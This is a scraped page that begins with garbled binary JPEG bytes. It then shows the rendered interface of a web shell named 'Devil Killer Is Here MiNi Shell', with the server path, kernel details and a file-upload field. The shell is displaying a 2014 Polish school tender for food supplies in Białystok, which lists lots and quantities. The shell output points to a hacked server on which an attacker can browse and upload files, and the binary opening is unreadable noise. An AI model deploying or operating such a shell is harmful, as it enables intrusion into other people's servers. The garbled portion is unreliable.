JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141120/380556-N-2014.html

<p class="kh_header"><b>Białystok: Sukcesywny zakup i dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 380556 - 2014; data zamieszczenia: 20.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkolno-Przedszkolny Nr 1 w Białymstoku , ul. Strażacka 25, 15-687 Białystok, woj. podkarpackie, tel. 85 6531779, 85 6531779 wew. 30, faks 85 6531779.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.sp16.bialystok.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywny zakup i dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywny zakup i dostawa artykułów spożywczych, w/g poniższych PAKIETÓW, tj.:
PAKIET	1	Jaja
PAKIET	2	Mięso i wędliny
PAKIET	3	Mrożonki
PAKIET	4	Owoce i warzywa
PAKIET	5	Pozostałe produkty spożywcze
PAKIET	6	Wyroby mleczarskie
PAKIET	7	Ziemniaki
PAKIET	8	Pieczywo.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 01.24.20.00-5, 15.10.00.00-9, 15.33.11.70-9, 15.30.00.00-1, 15.80.00.00-6, 15.90.00.00-3, 15.33.00.00-0, 15.40.00.00-2, 15.60.00.00-4, 15.50.00.00-3, 15.31.00.00-4, 15.81.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż wykonawca spełnia warunki udziału w postępowaniu, o których mowa w pkt 3, poprzez złożenie przez wykonawcę oświadczenia wynikającego z art. 44 ustawy (wzór - zał. od nr 1 do 8, stosownie dla właściwego PAKIETU) i tym samym wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert świadczył dostawy minimum trzem podmiotom  w zakresie objętym zamówieniem.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto do oferty należy dołączyć następujące informacje i dokumenty: a)formularz ofertowy (wzór - zał. od nr 1 do 8, stosownie dla właściwego PAKIETU - FORMULARZ OFERTOWY W TRYBIE PRZETARGU NIEOGRANICZONEGO); b)pełnomocnictwo do podpisywania oferty oraz do podpisywania zobowiązań w imieniu wykonawcy/konsorcjum (np. jeśli ofertę podpisuje osoba/osoby nie figurujące w odpisie z właściwego rejestru); c)listę podmiotów należących do tej samej grupy kapitałowej w przypadku gdy Wykonawca należy do grupy kapitałowej o której mowa w art. 24 ust. 2 pkt 5 ustawy; Złożenie przez wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów lub nierzetelnych oświadczeń mających istotne znaczenie dla prowadzonego postępowania jest karalne. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa w ppkt. 2 lit. b-f, może przedłożyć równoważne dokumenty określone Rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane (Dz. U. z 2013 poz. 231).tj. dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że: a)nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, Na podstawie art. 26 ust. 2b ustawy wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółka cywilna, konsorcjum), każdy z wykonawców składa oddzielnie dokumenty wymienione w ppkt 2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Czas realizacji zamówienia uzupełniającego złożonego w dniu dostawy (od 1 godziny do 6 godzin) - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w zakresie terminu realizacji zamówienia w przypadku powstania okoliczności których nie można było wcześniej przewidzieć, a które uniemożliwiają realizację zamówienia w pożądanym terminie oraz w przypadku zmiany obowiązujących przepisów prawa związanych z przedmiotowym zamówieniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.sp16.bialystok.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkolno - Przedszkolny Nr 1 w Białymstoku, 
15-687 Białystok, 
ul. Strażacka 25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2014 godzina 16:00, miejsce: Zespół Szkolno - Przedszkolny Nr 1 w Białymstoku 
15-687 Białystok, 
ul. Strażacka 25, pokój Intendenta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja świeże rozmiar L (waga 1 sztuki - od 0,063 do 0,073 kg)	szt.	13137

(wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 01.24.20.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji zamówienia uzupełniającego złożonego w dniu dostawy (od 1 godziny do 6 godzin) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> boczek wędzony parzony	kg	53,46
filet wędzony z piersi kurczaka kg	22,00
kurczak świeży  - korpusy kg	42,77
łopatka wieprzowa bez kości kg	213,28
mięso mielone mieszane kg	959,76
parówka drobiowa kg	66,00
pasztet drobiowy kg	20,00
pierś z kurczaka kg	1910,96
polędwica wieprzowa - sopocka kg	112,20
szynka gotowana kg	37,00
udko z kurczaka	kg	534,60
udziec z indyka	kg	533,20
wędlina drobiowa kg	32,53
schab wieprzowy bez kości kg	855,36

(wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji zamówienia uzupełniającego złożonego w dniu dostawy (od 1 godziny do 6 godzin) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brokuły mrożone, pakowane luzem	kg	267,30
fasolka szparagowa zielona, mrożona, pakowana luzem	kg	534,04
groszek zielony,  mrożony, pakowany luzem	kg	53,32
kalafior mrożony, pakowany luzem	kg	160,38
maliny mrożone	kg	155,00
marchew mrożona - kostka, pakowana luzem	kg	250,80
ryby mrożone ( miruna lub morszczuk) typu shatter pack, glazura maksymalnie do 5%	kg	79,98
mieszanka kompotowa mrożona, pakowana luzem (czarna porzeczka, aronia, truskawka i śliwka)	kg	590,35
mini marchewki mrożone	kg	319,92
paluszki rybne mrożone kg	534,60
szpinak mrożony pakowany luzem (rozdrobniony brykiet)	kg	186,62
włoszczyzna mrożona CIĘTE PASKI, pakowana luzem	kg	4069,20
zupa kalafiorowa, mrożona - mieszanka warzyw kg	106,64

 (wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji zamówienia uzupełniającego złożonego w dniu dostawy (od 1 godziny do 6 godzin) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Owoce i warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bakłażan	kg	106,64
botwina	kg	106,92
buraki 	kg	587,22
cebula biała	 kg	196,97
cukinia 	kg	677,36
czosnek  (główki) 	kg	11,73
dynia żółta 	kg	159,96
kapusta biała 	kg 	240,43
kapusta pekińska 	kg	239,94
koper 	kg	21,34
ogórki kiszone 	kg	501,98
ogórki świeże 	kg	289,88
papryka świeża 	kg	23,00
pieczarki	kg	373,52
pietruszka w korzeniu 	kg	85,54
pietruszka zielona natka zwykła 	pęczek	139,08
pomidory świeże 	kg	317,46
pory 	kg	426,98
rzodkiewka 	pęczek	428,20
sałata lodowa 	kg	213,28
sałata masłowa 	kg	186,41
seler naciowy	kg	160,38
szczypior	kg	65,12
arbuz kg	132,00
banany	kg	254,92
brzoskwinia kg	100,00
cytryny 	kg	183,30
gruszki deserowe	kg	558,08
jabłka 	kg	534,60
kiwi	kg	33,00
mandarynki	kg	246,28
morele suszone	kg	10,00
mięta świeża	szt.	22,00
pomarańcze 	kg	551,22
rodzynki	kg	25,00
śliwki świeże	kg	373,24
śliwki wędzone (kalifornijskie)	kg	30,00

(wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji zamówienia uzupełniającego złożonego w dniu dostawy (od 1 godziny do 6 godzin) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pozostałe produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> liść laurowy /opakowania cateringowe min. 0,5 kg, max. 1 kg/	kg	1,50
majeranek otarty - opakowania min. 0,5 kg max. 1 kg	kg	2,00
majonez  wyborowy na bazie oleju rzepakowego o zawartości 70% w produkcie, zawartości 2,5% żółtka jaja kurzego w proszku, opakowania 0,73 L	kg	15,35
cynamon mielony, opakowania cateringowe   	kg	0,5
pieprz naturalny czarny, mielony - opakowania cateringowe min. 0,5 kg, max 1 kg	kg	3,00 klasyczna przyprawa do zup, sosów, mięs, warzyw, ryb  w płynie opakowania cateringowe min. 1000 g. 	L	120,00
przyprawa do mięs (sól, mąka pszenna, papryka łagodna, papryka ostra, cebula, cukier, koncentrat pomidorowy, tłuszcz roślinny, czosnek, natka pietruszki, rozmaryn, pieprz czarny, oregano, tymianek, majeranek - opakowania cateringowe 0,2 kg	kg	10,00 sól drobna, warzona, próżniowa, jodowana, do celów spożywczych, opakowanie 1 kg	kg	290,00 przyprawa warzywna do potraw (sól kuchenna, suszone warzywa 15,5 %, - marchew, pasternak, ziemniaki, cebula, seler, natka pietruszki, cukier, przyprawy, skrobia kukurydziana,) -opakowania cateringowe min. 1 kg	kg	186,00 ziele angielskie  ziarna - opakowania cateringowe min. 0,5 kg	kg	0,50 przyprawa do ryb  (sól, mąka pszenna, papryka łagodna, papryka ostra, cebula, cukier, koncentrat pomidorowy, tłuszcz roślinny, czosnek, natka pietruszki, rozmaryn, pieprz czarny, oregano, tymianek, majeranek - opakowania cateringowe 0,2 kg	kg	10,00 ananasy w lekkim syropie - plastry, w puszce, pakowana 0,34 kg	kg	373,52 budyń  śmietankowy lub waniliowy (opakowania cateringowe min. 1 kg- max. 5 kg)	kg	15,00 kakao extra ciemne, o obniżonej zawartości tłuszczu (10-12% tłuszczu), o składzie zawierającym soję, gluten i mleko , pakowane 0,15 kg	kg	14,80 miód naturalny	kg	182,13 wiśnie (lub truskawki) w żelu (drążone 60% owoców w składzie)  opakowania cateringowe  3,2 kg	kg	110,00
dżem niskosłodzony , pakowany 0,28 kg	kg	30,38
ketchup łagodny (1L)	L	10,50
kukurydza w puszce, min 55% surowca, pakowana 0,4 kg	kg	106,64
soki owocowe  100 % naturalne 0,33 l	L	1286,40
cukier biały - opakowanie 1 kg	kg	925,98
herbata czarna ekspresowa	szt.	4161,00
herbata miętowa ekspresowa	szt.	500,00
herbata owocowa ekspresowa	szt.	3600,00
kasza kukurydziana	kg	15,00
kasza kuskus	kg	373,52
Kasza manna, pakowana 1 kg	kg	128,64
Kasza jęczmienna, średnia, (min. 0,5 kg, max. 5 kg)	kg	363,53
kawa Inka	kg	8,80
kawa zbożowa	kg	15,20
koncentrat pomidorowy 30 % , pakowany w szklanych opakowaniach - 1 kg	kg	336,05 makaron spagetti (zawartość w 100 g produktu - węglowodany 72,7 g, białko 11,5, błonnik 0,8)	kg	266,60
makaron kokardki (zawartość w 100 g produktu - węglowodany 72,7 g, białko 11,5, błonnik 0,8)	kg	497,30
ryż biały, długoziarnisty	kg	521,97
płatki owsiane typu Górskie	kg	140,25
mąka typ 500 pakowana luzem po 25 KG lub 1 kg	kg	1314,87
zacierka makaronowa, dwujajeczna	kg	159,96
makrela w pomidorach (puszka) kg	36,00
płatki czekoladowe	kg	30,00
płatki kukurydziane	kg	47,00
musli owocowe	kg	72,00
orzechowy krem do smarowania pieczywa (cukier, olej palmowy, orzechy laskowe (13%), kakao w proszku o obniżonej zawartości tłuszczu (7,4%), mleko odtłuszczone w proszku (6,6%), serwatka w proszku, emulgator: lecytyny (soja), wanilina)	kg	26,73

 (wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.33.00.00-0, 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji zamówienia uzupełniającego złożonego w dniu dostawy (od 1 godziny do 6 godzin) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wyroby mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jogurt naturalny pakowany 0,4 ml	kg	149,19
jogurt pitny 250 ml - butelka plastikowa kg	2100,00
kefir 0% tłuszczu pakowany 0,4 ml	kg	55,00
mleko spożywcze pasteryzowane 1,5% tłuszczu, bez laktozy w opakowaniu kartonowym 1 Litr	kg	785,93
mleko spożywcze pasteryzowane 2% tłuszczu, w opakowaniu kartonowym lub plastikowym 1 Litr	kg	5830,95
ser biały, twarogowy, mielony półtłusty, wyprodukowany z mleka pasteryzowanego, zawierający żywe kultury bakterii mlekowych,  pakowany 0,5 kg	kg	345,38
ser żółty typu GOUDA, plasterkowany, wyprodukowany z mleka pasteryzowanego, zawierający żywe kultury bakterii mlekowych ,min. 23% tłuszczu w 100 g produktu	kg	208,70 ser topiony (typu -kiełbaska)różne smaki	kg	78,50
serek waniliowy, homogenizowany, wyprodukowany z mleka pasteryzowanego, zawierający żywe kultury bakterii mlekowych,  pakowany 0,5 kg	kg	15,00
śmietana do zup, sosów i sałatek 18% tłuszczu, z dodatkiem skrobi modyfikowanej kukurydzianej, zagęszczana pektyną oraz mączką chleba świętojańskiego, pakowana 0,4 kg	kg	1023,17
masło śmietankowe, miks tłuszczowy do smarowania min. 67 % tłuszczu (tłuszcz mleczny35 %, tłuszcz roślinny32 %, na bazie śmietanki pasteryzowanej, zawierające kultury bakterii mlekowych, pakowane 0,2 kg	kg	161,93
masło roślinne , pakowane 0.25 kg lub 0,5 kg	kg	150,80
olej uniwersalny, rzepakowy, rafinowany, o zawartości tłuszczu  10 g , pakowany w 1 litrowych butelkach  	l	557,90

 (wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3, 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji zamówienia uzupełniającego złożonego w dniu dostawy (od 1 godziny do 6 godzin) - 10</li>
</ul>
</li>
